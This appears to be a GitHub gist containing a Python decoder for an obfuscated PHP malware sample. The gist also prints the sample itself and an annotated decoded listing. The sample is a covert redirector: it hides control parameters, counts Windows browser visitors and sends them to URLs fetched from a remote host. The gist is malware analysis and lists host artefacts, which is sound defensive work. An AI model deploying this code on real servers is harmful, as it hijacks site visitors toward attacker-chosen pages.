@Rurik
Last active April 3, 2021 16:46
A quickie decoder script for encoded PHP code. May be Fort Disco?
import base64
script = """
<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' .'vY' .'2s' .'='),base64_decode('Zm' .'Nsb3' .'Nl'),base64_decode('Z' .'mlsZV9leG' .'lzdH' .'M='),base64_decode('dW5zZX' .'JpYWx' .'pemU='),base64_decode('Z' .'mlsZV9nZXRfY29udGVu' .'dHM='),base64_decode('dGlt' .'ZQ' .'=' .'='),base64_decode('Zm' .'ls' .'Z' .'V9n' .'ZX' .'RfY29' .'ud' .'GVu' .'dHM='),base64_decode('d' .'GltZ' .'Q=='),base64_decode('Zm9w' .'ZW4='),base64_decode('Zmx' .'vY2s='),base64_decode('' .'ZnB1dHM='),base64_decode('c2VyaWFsaX' .'pl'),base64_decode('Zm' .'xvY2s='),base64_decode('ZmNsb' .'3N' .'l'),base64_decode('c' .'3Vic3Ry'),base64_decode('' .'a' .'GVhZGVy'),base64_decode('aGVhZGV' .'y')); ?><? 
function _1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND $_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__) ._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT ._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND $GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0 ._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo _1348942592(10);}else{echo _1348942592(11);}}else{echo _1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND $_GET[_1348942592(14)]== _1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)] ._1348942592(17));echo $_1;exit;}if(isset($_GET[_1348942592(18)])AND $_GET[_1348942592(19)]== _1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)] ._1348942592(22))){echo _1348942592(23);}else{echo 
_1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30) .$GLOBALS['_584730172_'][15](_1348942592(31),$_2) ._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34) .$GLOBALS['_584730172_'][17](_1348942592(35),$_3) ._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)] ._1348942592(39));if($_4 == _1348942592(40)or $_4 == false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)] ._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0 ._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!= _1348942592(57))$_11=_1348942592(58) .$_11 ._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60)); ?>
"""
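# Static decoder for the obfuscated PHP held in `script`.
#
# The sample is made of three "<?" segments:
#   1. an array of Base64-encoded PHP function names, stored in $GLOBALS,
#   2. a helper function that returns Base64-encoded string constants by index,
#   3. the payload, which refers to both tables by numeric index only.
# Everything below is plain text substitution; nothing from the sample is
# evaluated or executed. Written for Python 3 (print() with a single argument
# also works on Python 2).

# Names the sample uses for its two lookup tables.
FUNCTION_TABLE = "$GLOBALS['_584730172_']"
STRING_LOOKUP = "_1348942592"


def _decode_b64(value):
    """Return the Base64 literal `value` decoded to text.

    Latin-1 maps every byte to exactly one code point, so arbitrary decoded
    bytes can be joined with the PHP source text without a decode error.
    """
    return base64.b64decode(value).decode("latin-1")


def _php_single_quoted(text):
    """Render `text` as a PHP single-quoted literal.

    Backslashes and quotes are escaped so that a decoded string containing
    a quote cannot end the literal early and be misread as code by whoever
    (or whatever tool) reads the decoded output.
    """
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def _is_index(text):
    """True when `text` is a non-empty run of ASCII digits."""
    return bool(text) and all(ch in "0123456789" for ch in text)


def parse_function_table(section):
    """Decode the function names listed in the first segment, in order."""
    names = []
    for entry in section.split("base64_decode"):
        # The text before the first call is the array assignment, not a value.
        if "GLOBALS" in entry:
            continue
        # Join the pieces of a literal that was split with PHP concatenation.
        entry = entry.replace("' .'", "")
        # The Base64 value is whatever sits between the first pair of quotes.
        names.append(_decode_b64(entry.split("'")[1]))
    return names


def parse_string_table(section):
    """Decode the string constants listed in the second segment, in order."""
    return [_decode_b64(entry.split("'")[1]) for entry in section.split(",")]


def _resolve(code, marker, opener, closer, table, render):
    """Replace every `marker<opener>N<closer>` in `code` with render(table[N]).

    A reference is left untouched when N is not a plain number or is outside
    the table, so an unexpected construct stays visible in the output instead
    of aborting the whole run.
    """
    pieces = code.split(marker)
    resolved = [pieces[0]]
    for piece in pieces[1:]:
        end = piece.find(closer)
        index = piece[1:end] if piece.startswith(opener) and end > 0 else ""
        if _is_index(index) and int(index) < len(table):
            resolved.append(render(table[int(index)]) + piece[end + 1:])
        else:
            resolved.append(marker + piece)
    return "".join(resolved)


def deobfuscate(script):
    """Return the payload of `script` with both lookup tables resolved.

    Raises ValueError when the input does not contain the three "<?"
    segments (function table, string table, code) this decoder expects.
    """
    sections = script.split("<?")
    if len(sections) < 4:
        raise ValueError(
            "expected three '<?' segments: function table, string table, code")
    functions = parse_function_table(sections[1])
    strings = parse_string_table(sections[2])
    # Keep any further "<?" blocks instead of silently dropping them.
    code = "<?" + "<?".join(sections[3:])
    # Function references first, then string lookups, as in the sample's layout.
    code = _resolve(code, FUNCTION_TABLE, "[", "]", functions, lambda name: name)
    code = _resolve(code, STRING_LOOKUP, "(", ")", strings, _php_single_quoted)
    return code


if __name__ == "__main__":
    # Print the final code.
    print(deobfuscate(script))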
RESULTS:
Decoded script:
// Decoded form of the obfuscated sample, annotated for analysis.
// The listing looks reflowed by a formatter: expressions are broken across
// lines, a trailing "@" is PHP's error-suppression operator for the call on
// the following line, and "= >" stands for "=>". The code is kept as found.
// Artefacts visible in this listing that can be searched for on a host:
// "<script path>.count", "settings.json", "ololo.txt", and outbound requests
// to the host stored in $_0.
// round(0) evaluates to 0: error reporting off, no execution time limit.
error_reporting(round(0));
set_time_limit(round(0));
// Base URL of the remote host that the script fetches text files from.
$_0 = 'http://gayleecher.com:81';
// Self-test branch, taken when the request carries qwe123=123qwe.
// It deletes, recreates and deletes ololo.txt next to this script to test
// write access, requires <$_0>/iframe.txt to contain 'test', and prints
// 'work' or one of the two failure strings before exiting.
if (isset($_GET['qwe123']) AND $_GET['qwe123'] == '123qwe') {
define('ROOT', dirname(__FILE__).
'/');
define('LOG', ROOT.
'ololo.txt');@
unlink(LOG);
if (!file_exists(LOG)) {@
touch(LOG);
if (is_writable(LOG) AND trim(file_get_contents($_0.
'/iframe.txt')) == 'test') {@
unlink(LOG);
echo 'work';
} else {
echo 'NO WORK, NOT GET URL';
}
} else {
echo 'NO WORK, NOT WRITIBLE';
}
exit;
}
// aaa=aaa: print the contents of "<script path>.count" (the counter that the
// visitor branch below increments) and exit.
if (isset($_GET['aaa']) AND $_GET['aaa'] == 'aaa') {
$_1 = file_get_contents($_SERVER['SCRIPT_FILENAME'].
'.count');
echo $_1;
exit;
}
// bbb=ccc: delete that counter file, report the outcome and exit.
if (isset($_GET['bbb']) AND $_GET['bbb'] == 'ccc') {
if (unlink($_SERVER['SCRIPT_FILENAME'].
'.count')) {
echo 'Null count ok';
} else {
echo 'ERROR null count((';
}
exit;
}
// Visitor branch: continues only when the User-Agent matches one of
// MSIE/Firefox/Opera and also contains "Windows" (both case-insensitive).
// Requests that do not match fall through to the statement after this block.
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$_2 = array('MSIE', 'Firefox', 'Opera');
$_3 = array('Windows');
if (preg_match('/'.implode('|', $_2).
'/i', $_SERVER['HTTP_USER_AGENT'])) {
if (preg_match('/'.implode('|', $_3).
'/i', $_SERVER['HTTP_USER_AGENT'])) {
// Hit counter: read "<script path>.count", treat empty or unreadable as 0,
// then rewrite the file with the value plus one while holding a file lock.
$_4 = @file_get_contents($_SERVER['SCRIPT_FILENAME'].
'.count');
if ($_4 == ''
or $_4 == false) $_4 = round(0);
$_5 = @fopen($_SERVER['SCRIPT_FILENAME'].
'.count', 'w');@
flock($_5, LOCK_EX);@
fputs($_5, $_4 + round(0 + 1));@
flock($_5, LOCK_UN);@
fclose($_5);
// $_6: remote file that supplies the redirect target.
// $_7: 300, compared below against a time() difference, i.e. seconds.
// $_8: fallback redirect target used when no fetched URL is available.
$_6 = $_0.
'/iframe2.txt';
$_7 = round(0 + 300);
$_8 = 'http://ya.ru/';
if (!$_6) exit();
// settings.json (relative path) caches the last fetch time and URL as a
// serialized PHP array; without the file the fallback values are used.
$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) : array('last' = > round(0), 'url' = > $_8);
// Refresh when the cached entry is older than $_7 seconds. The assignment
// inside the condition overwrites 'url' even when the fetch fails; the
// cache file is rewritten only when the fetch returned something.
if ($_9['last'] < time() - $_7) {
if ($_9['url'] = file_get_contents($_6)) {
$_9['last'] = time();
$_10 = fopen('settings.json', 'w');
flock($_10, LOCK_EX);
fputs($_10, serialize($_9));
flock($_10, LOCK_UN);
fclose($_10);
}
}
// Use the cached or fetched URL, else the fallback; a value that does not
// start with 'http' is wrapped as 'http://<value>/'.
$_11 = $_9['url'] ? $_9['url'] : $_8;
if (substr($_11, round(0), round(0 + 1 + 1 + 1 + 1)) != 'http') $_11 = 'http://'.$_11.
'/';
// Send the matching visitor to that URL with a Location header.
header("Location: $_11");
exit;
}
}
}
header('HTTP/1.1 404 Not Found'); ?>